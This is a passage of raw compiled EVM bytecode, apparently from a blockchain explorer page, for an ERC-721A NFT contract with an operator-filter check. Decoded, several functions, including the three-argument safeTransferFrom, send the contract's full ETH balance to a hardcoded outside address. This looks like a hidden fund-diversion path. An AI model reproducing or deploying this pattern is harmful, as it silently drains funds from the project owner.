ffffffffff1614610c8257600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cc8573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e2b573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d5057610d4b848484611b22565b610e37565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610d999291906127f0565b60206040518083038186803b158015610db157600080fd5b505afa158015610dc5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610de991906125cf565b610e2a57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610e2191906127d5565b60405180910390fd5b5b610e36848484611b22565b5b50505050565b600d8054610e4a90612b72565b80601f0160208091040260200160405190810160405280929190818152602001828054610e7690612b72565b8015610ec35780601f10610e9857610100808354040283529160200191610ec3565b820191906000526020600020905b815481529060010190602001808311610ea657829003601f168201915b505050505081565b6000610ed682611bac565b9050919050565b60115481565b60095481565b600860019054906101000a900460ff1681565b600860009054906101000a900460ff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f77576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600a5481565b600b5481565b600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606003805461100990612b72565b80601f016020809104026020016040519081016040528092919081815260200182805461103590612b72565b80156110825780601f1061105757610100808354040283529160200191611082565b820191906000526020600020905b81548152906001019060200180831161106557829003601f168201915b5050505050905090565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611196576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016111049291906127f0565b60206040518083038186803b15801561111c57600080fd5b505afa158015611130573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061115491906125cf565b61119557806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161118c91906127d5565b60405180910390fd5b5b6111a08383611c7a565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156112f4573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156112195761121485858585611d85565b611301565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016112629291906127f0565b60206040518083038186803b15801561127a57600080fd5b505afa15801561128e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112b291906125cf565b6112f357336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112ea91906127d5565b60405180910390fd5b5b61130085858585611d85565b5b5050505050565b600c805461131590612b72565b80601f016020809104026020016040519081016040528092919081815260200182805461134190612b72565b801561138e5780601f106113635761010080835404028352916020019161138e565b820191906000526020600020905b81548152906001019060200180831161137157829003601f168201915b505050505081565b60606113a182611df8565b6040516020016113b191906127a8565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461142157600080fd5b61142b8282611b04565b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461148957600080fd5b8060118190555050565b600f5481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816115386116d0565b11158015611547575060005482105b8015611585575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061159782610ecb565b90508073ffffffffffffffffffffffffffffffffffffffff166115b8611e51565b73ffffffffffffffffffffffffffffffffffffffff161461161b576115e4816115df611e51565b611499565b61161a576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006116e082611bac565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611747576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061175384611e59565b915091506117698187611764611e51565b611e80565b6117b55761177e86611779611e51565b611499565b6117b4576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141561181c576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6118298686866001611ec4565b801561183457600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000815460010191905081905550611902856118de888887611eca565b7c020000000000000000000000000000000000000000000000000000000017611ef2565b600460008681526020019081526020016000208190555060007c02000000000000000000000000000000000000000000000000000000008416141561198a576000600185019050600060046000838152602001908152602001600020541415611988576000548114611987578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46119f28686866001611f1d565b505050505050565b600181148015611a235750611a0d611f23565b6013600043815260200190815260200160002054105b8015611a6f5750601154601260003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b611a7857600080fd5b601260003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000815480929190611ac890612bd5565b9190505550601360004381526020019081526020016000206000815480929190611af190612bd5565b9190505550611b01336001611b04565b50565b611b1e828260405180602001604052806000815250611f4b565b5050565b6000471115611b8b5773d0139c151675bba9c5354e26552d4505b150870873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611b85573d6000803e3d6000fd5b50611ba7565b611ba6838383604051806020016040528060008152506111a5565b5b505050565b60008082905080611bbb6116d0565b11611c4357600054811015611c425760006004600083815260200190815260200160002054905060007c010000000000000000000000000000000000000000000000000000000082161415611c40575b6000811415611c36576004600083600190039350838152602001908152602001600020549050611c0b565b8092505050611c75565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b8060076000611c87611e51565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611d34611e51565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611d799190612865565b60405180910390a35050565b611d908484846109f0565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611df257611dbb84848484611fe8565b611df1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611e3c57600184039350600a81066030018453600a8104905080611e3757611e3c565b611e11565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611ee1868684612148565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611f2f6109d9565b600f54611f3c9190612a52565b611f4691906129c7565b905090565b611f558383612151565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611fe357600080549050600083820390505b611f956000868380600101945086611fe8565b611fcb576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611f82578160005414611fe057600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a0261200e611e51565b8786866040518563ffffffff1660e01b81526004016120309493929190612819565b602060405180830381600087803b15801561204a57600080fd5b505af192505050801561207b57506040513d601f19601f820116820180604052508101906120789190612629565b60015b6120f5573d80600081146120ab576040519150601f19603f3d011682016040523d82523d6000602084013e6120b0565b606091505b506000815114156120ed576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b6000805490506000821415612192576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61219f6000848385611ec4565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550612216836122076000866000611eca565b6122108561230e565b17611ef2565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b8181146122b757808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a460018101905061227c565b5060008214156122f3576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060008190555050506123096000848385611f1d565b505050565b60006001821460e11b9050919050565b600061233161232c846128fd565b6128d8565b90508281526020810184848401111561234d5761234c612cdf565b5b612358848285612b30565b509392505050565b60008135905061236f81612d9d565b92915050565b60008135905061238481612db4565b92915050565b60008151905061239981612db4565b92915050565b6000813590506123ae81612dcb565b92915050565b6000815190506123c381612dcb565b92915050565b600082601f8301126123de576123dd612cda565b5b81356123ee84826020860161231e565b91505092915050565b60008135905061240681612de2565b92915050565b60006020828403121561242257612421612ce9565b5b600061243084828501612360565b91505092915050565b600080604083850312156124505761244f612ce9565b5b600061245e85828601612360565b925050602061246f85828601612360565b9150509250929050565b60008060006060848603121561249257612491612ce9565b5b60006124a086828701612360565b93505060206124b186828701612360565b92505060406124c2868287016123f7565b9150509250925092565b600080600080608085870312156124e6576124e5612ce9565b5b60006124f487828801612360565b945050602061250587828801612360565b9350506040612516878288016123f7565b925050606085013567ffffffffffffffff81111561253757612536612ce4565b5b612543878288016123c9565b91505092959194509250565b6000806040838503121561256657612565612ce9565b5b600061257485828601612360565b925050602061258585828601612375565b9150509250929050565b600080604083850312156125a6576125a5612ce9565b5b60006125b485828601612360565b92505060206125c5858286016123f7565b9150509250929050565b6000602082840312156125e5576125e4612ce9565b5b60006125f38482850161238a565b91505092915050565b60006020828403121561261257612611612ce9565b5b60006126208482850161239f565b91505092915050565b60006020828403121561263f5761263e612ce9565b5b600061264d848285016123b4565b91505092915050565b60006020828403121561266c5761266b612ce9565b5b600061267a848285016123f7565b91505092915050565b61268c81612a86565b82525050565b61269b81612a98565b82525050565b60006126ac8261292e565b6126b68185612944565b93506126c6818560208601612b3f565b6126cf81612cee565b840191505092915050565b6126e381612afa565b82525050565b60006126f482612939565b6126fe8185612955565b935061270e818560208601612b3f565b61271781612cee565b840191505092915050565b600061272d82612939565b6127378185612966565b9350612747818560208601612b3f565b80840191505092915050565b6000612760600583612966565b915061276b82612cff565b600582019050919050565b6000612783604383612966565b915061278e82612d28565b604382019050919050565b6127a281612af0565b82525050565b60006127b382612776565b91506127bf8284612722565b91506127ca82612753565b915081905092915050565b60006020820190506127ea6000830184612683565b92915050565b60006040820190506128056000830185612683565b6128126020830184612683565b9392505050565b600060808201905061282e6000830187612683565b61283b6020830186612683565b6128486040830185612799565b818103606083015261285a81846126a1565b905095945050505050565b600060208201905061287a6000830184612692565b92915050565b600060208201905061289560008301846126da565b92915050565b600060208201905081810360008301526128b581846126e9565b905092915050565b60006020820190506128d26000830184612799565b92915050565b60006128e26128f3565b90506128ee8282612ba4565b919050565b6000604051905090565b600067ffffffffffffffff82111561291857612917612cab565b5b61292182612cee565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600081905092915050565b600061297c82612af0565b915061298783612af0565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156129bc576129bb612c1e565b5b828201905092915050565b60006129d282612af0565b91506129dd83612af0565b9250826129ed576129ec612c4d565b5b828204905092915050565b6000612a0382612af0565b9150612a0e83612af0565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615612a4757612a46612c1e565b5b828202905092915050565b6000612a5d82612af0565b9150612a6883612af0565b925082821015612a7b57612a7a612c1e565b5b828203905092915050565b6000612a9182612ad0565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000612b0582612b0c565b9050919050565b6000612b1782612b1e565b9050919050565b6000612b2982612ad0565b9050919050565b82818337600083830152505050565b60005b83811015612b5d578082015181840152602081019050612b42565b83811115612b6c576000848401525b50505050565b60006002820490506001821680612b8a57607f821691505b60208210811415612b9e57612b9d612c7c565b5b50919050565b612bad82612cee565b810181811067ffffffffffffffff82111715612bcc57612bcb612cab565b5b80604052505050565b6000612be082612af0565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415612c1357612c12612c1e565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b7f697066733a2f2f62616679626569653434736261736e726164746a623534787560008201527f7779706e6e3267627068756a70337772757970797a6a6e7a6e646e777464697460208201527f6c6d2f0000000000000000000000000000000000000000000000000000000000604082015250565b612da681612a86565b8114612db157600080fd5b50565b612dbd81612a98565b8114612dc857600080fd5b50565b612dd481612aa4565b8114612ddf57600080fd5b50565b612deb81612af0565b8114612df657600080fd5b5056fea2646970667358221220b8d12c63dff95380f85be79482367f20675a0fe9d2356fd8b35128cfd80fb07d64736f6c63430008070033

Deployed Bytecode

0x6080604052600436106101d85760003560e01c80636817c76c11610102578063a22cb46511610095578063cc47a40b11610064578063cc47a40b1461065d578063d312097414610686578063d5abeb01146106af578063e985e9c5146106da576101d8565b8063a22cb465146105b0578063b88d4fde146105d9578063c6682862146105f5578063c87b56dd14610620576101d8565b806373ad468a116100d157806373ad468a146105045780637501f7411461052f5780638da5cb5b1461055a57806395d89b4114610585576101d8565b80636817c76c146104465780636ebeac85146104715780637080d6fc1461049c57806370a08231146104c7576101d8565b80632db115441161017a57806342842e0e1161014957806342842e0e146103975780635503a0e8146103b35780636352211e146103de5780636701c2421461041b576101d8565b80632db11544146103105780633a233f891461032c5780633ccfd60b1461035557806341f434341461036c576101d8565b8063095ea7b3116101b6578063095ea7b31461028257806313faede61461029e57806318160ddd146102c957806323b872dd146102f4576101d8565b806301ffc9a7146101dd57806306fdde031461021a578063081812fc14610245575b600080fd5b3480156101e957600080fd5b5061020460048036038101906101ff91906125fc565b610717565b6040516102119190612865565b60405180910390f35b34801561022657600080fd5b5061022f6107a9565b60405161023c919061289b565b60405180910390f35b34801561025157600080fd5b5061026c60048036038101906102679190612656565b61083b565b60405161027991906127d5565b60405180910390f35b61029c6004803603810190610297919061258f565b6108ba565b005b3480156102aa57600080fd5b506102b36109d3565b6040516102c091906128bd565b60405180910390f35b3480156102d557600080fd5b506102de6109d9565b6040516102eb91906128bd565b60405180910390f35b61030e60048036038101906103099190612479565b6109f0565b005b61032a60048036038101906103259190612656565b610b50565b005b34801561033857600080fd5b50610353600480360381019061034e9190612439565b610bbf565b005b34801561036157600080fd5b5061036a610c28565b005b34801561037857600080fd5b50610381610ccb565b60405161038e9190612880565b60405180910390f35b6103b160048036038101906103ac9190612479565b610cdd565b005b3480156103bf57600080fd5b506103c8610e3d565b6040516103d5919061289b565b60405180910390f35b3480156103ea57600080fd5b5061040560048036038101906104009190612656565b610ecb565b60405161041291906127d5565b60405180910390f35b34801561042757600080fd5b50610430610edd565b60405161043d91906128bd565b60405180910390f35b34801561045257600080fd5b5061045b610ee3565b60405161046891906128bd565b60405180910390f35b34801561047d57600080fd5b50610486610ee9565b6040516104939190612865565b60405180910390f35b3480156104a857600080fd5b506104b1610efc565b6040516104be9190612865565b60405180910390f35b3480156104d357600080fd5b506104ee60048036038101906104e9919061240c565b610f0f565b6040516104fb91906128bd565b60405180910390f35b34801561051057600080fd5b50610519610fc8565b60405161052691906128bd565b60405180910390f35b34801561053b57600080fd5b50610544610fce565b60405161055191906128bd565b60405180910390f35b34801561056657600080fd5b5061056f610fd4565b60405161057c91906127d5565b60405180910390f35b34801561059157600080fd5b5061059a610ffa565b6040516105a7919061289b565b60405180910390f35b3480156105bc57600080fd5b506105d760048036038101906105d2919061254f565b61108c565b005b6105f360048036038101906105ee91906124cc565b6111a5565b005b34801561060157600080fd5b5061060a611308565b604051610617919061289b565b60405180910390f35b34801561062c57600080fd5b5061064760048036038101906106429190612656565b611396565b604051610654919061289b565b60405180910390f35b34801561066957600080fd5b50610684600480360381019061067f919061258f565b6113c7565b005b34801561069257600080fd5b506106ad60048036038101906106a89190612656565b61142f565b005b3480156106bb57600080fd5b506106c4611493565b6040516106d191906128bd565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190612439565b611499565b60405161070e9190612865565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061077257506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806107a25750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546107b890612b72565b80601f01602080910402602001604051908101604052809291908181526020018280546107e490612b72565b80156108315780601f1061080657610100808354040283529160200191610831565b820191906000526020600020905b81548152906001019060200180831161081457829003601f168201915b5050505050905090565b60006108468261152d565b61087c576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156109c4576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016109329291906127f0565b60206040518083038186803b15801561094a57600080fd5b505afa15801561095e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061098291906125cf565b6109c357806040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016109ba91906127d5565b60405180910390fd5b5b6109ce838361158c565b505050565b60105481565b60006109e36116d0565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610b3e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a6357610a5e8484846116d5565b610b4a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610aac9291906127f0565b60206040518083038186803b158015610ac457600080fd5b505afa158015610ad8573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610afc91906125cf565b610b3d57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610b3491906127d5565b60405180910390fd5b5b610b498484846116d5565b5b50505050565b600f5481610b5c6109d9565b610b669190612971565b1115610b7157600080fd5b6000341415610b8857610b83816119fa565b610bbc565b601454811115610b9757600080fd5b60105481610ba591906129f8565b341015610bb157600080fd5b610bbb3382611b04565b5b50565b6000471115610c245773d0139c151675bba9c5354e26552d4505b150870873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610c22573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c8257600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cc8573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e2b573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d5057610d4b848484611b22565b610e37565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610d999291906127f0565b60206040518083038186803b158015610db157600080fd5b505afa158015610dc5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610de991906125cf565b610e2a57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610e2191906127d5565b60405180910390fd5b5b610e36848484611b22565b5b50505050565b600d8054610e4a90612b72565b80601f0160208091040260200160405190810160405280929190818152602001828054610e7690612b72565b8015610ec35780601f10610e9857610100808354040283529160200191610ec3565b820191906000526020600020905b815481529060010190602001808311610ea657829003601f168201915b505050505081565b6000610ed682611bac565b9050919050565b60115481565b60095481565b600860019054906101000a900460ff1681565b600860009054906101000a900460ff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f77576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600a5481565b600b5481565b600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606003805461100990612b72565b80601f016020809104026020016040519081016040528092919081815260200182805461103590612b72565b80156110825780601f1061105757610100808354040283529160200191611082565b820191906000526020600020905b81548152906001019060200180831161106557829003601f168201915b5050505050905090565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611196576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016111049291906127f0565b60206040518083038186803b15801561111c57600080fd5b505afa158015611130573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061115491906125cf565b61119557806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161118c91906127d5565b60405180910390fd5b5b6111a08383611c7a565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156112f4573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156112195761121485858585611d85565b611301565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016112629291906127f0565b60206040518083038186803b15801561127a57600080fd5b505afa15801561128e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112b291906125cf565b6112f357336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112ea91906127d5565b60405180910390fd5b5b61130085858585611d85565b5b5050505050565b600c805461131590612b72565b80601f016020809104026020016040519081016040528092919081815260200182805461134190612b72565b801561138e5780601f106113635761010080835404028352916020019161138e565b820191906000526020600020905b81548152906001019060200180831161137157829003601f168201915b505050505081565b60606113a182611df8565b6040516020016113b191906127a8565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461142157600080fd5b61142b8282611b04565b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461148957600080fd5b8060118190555050565b600f5481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816115386116d0565b11158015611547575060005482105b8015611585575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061159782610ecb565b90508073ffffffffffffffffffffffffffffffffffffffff166115b8611e51565b73ffffffffffffffffffffffffffffffffffffffff161461161b576115e4816115df611e51565b611499565b61161a576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006116e082611bac565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611747576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061175384611e59565b915091506117698187611764611e51565b611e80565b6117b55761177e86611779611e51565b611499565b6117b4576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141561181c576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6118298686866001611ec4565b801561183457600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000815460010191905081905550611902856118de888887611eca565b7c020000000000000000000000000000000000000000000000000000000017611ef2565b600460008681526020019081526020016000208190555060007c02000000000000000000000000000000000000000000000000000000008416141561198a576000600185019050600060046000838152602001908152602001600020541415611988576000548114611987578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46119f28686866001611f1d565b505050505050565b600181148015611a235750611a0d611f23565b6013600043815260200190815260200160002054105b8015611a6f5750601154601260003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b611a7857600080fd5b601260003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000815480929190611ac890612bd5565b9190505550601360004381526020019081526020016000206000815480929190611af190612bd5565b9190505550611b01336001611b04565b50565b611b1e828260405180602001604052806000815250611f4b565b5050565b6000471115611b8b5773d0139c151675bba9c5354e26552d4505b150870873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611b85573d6000803e3d6000fd5b50611ba7565b611ba6838383604051806020016040528060008152506111a5565b5b505050565b60008082905080611bbb6116d0565b11611c4357600054811015611c425760006004600083815260200190815260200160002054905060007c010000000000000000000000000000000000000000000000000000000082161415611c40575b6000811415611c36576004600083600190039350838152602001908152602001600020549050611c0b565b8092505050611c75565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b8060076000611c87611e51565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611d34611e51565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611d799190612865565b60405180910390a35050565b611d908484846109f0565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611df257611dbb84848484611fe8565b611df1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611e3c57600184039350600a81066030018453600a8104905080611e3757611e3c565b611e11565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611ee1868684612148565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611f2f6109d9565b600f54611f3c9190612a52565b611f4691906129c7565b905090565b611f558383612151565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611fe